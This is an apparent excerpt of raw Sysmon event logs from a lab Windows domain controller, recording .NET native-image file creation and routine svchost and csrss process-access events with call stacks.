21:02:07.523{4DB9351A-A14F-60D3-DB02-00000000CF01}6544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CT5DBQT78A\UIAutomationClient.ni.dllMD5=79BF4ED10FC371DA5B5B4422DA9EE498,SHA256=38B451BB6946FF1E1E3F7940C38A846DFEC6C4BD71961FF8F448ED05496EEFCB,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:07.523{4DB9351A-A14F-60D3-DB02-00000000CF01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1990-0\UIAutomationClient.dll2021-06-23 21:02:07.523 23542300x800000000000000019469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.336{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEE94AA3880BF288BF9A5F6E1960C19E,SHA256=68A396540418904DF5EDB8308EA774C26E0BDF5C24E7EB74ED0F0AB4FF670ACF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.226{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14F-60D3-DB02-00000000CF01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.211{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A14F-60D3-DB02-00000000CF01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.211{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14F-60D3-DB02-00000000CF01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019451Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019450Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019449Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019448Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019447Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14F-60D3-DA02-00000000CF01}3936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019446Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019445Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019444Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019443Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019442Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019441Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019440Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019439Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 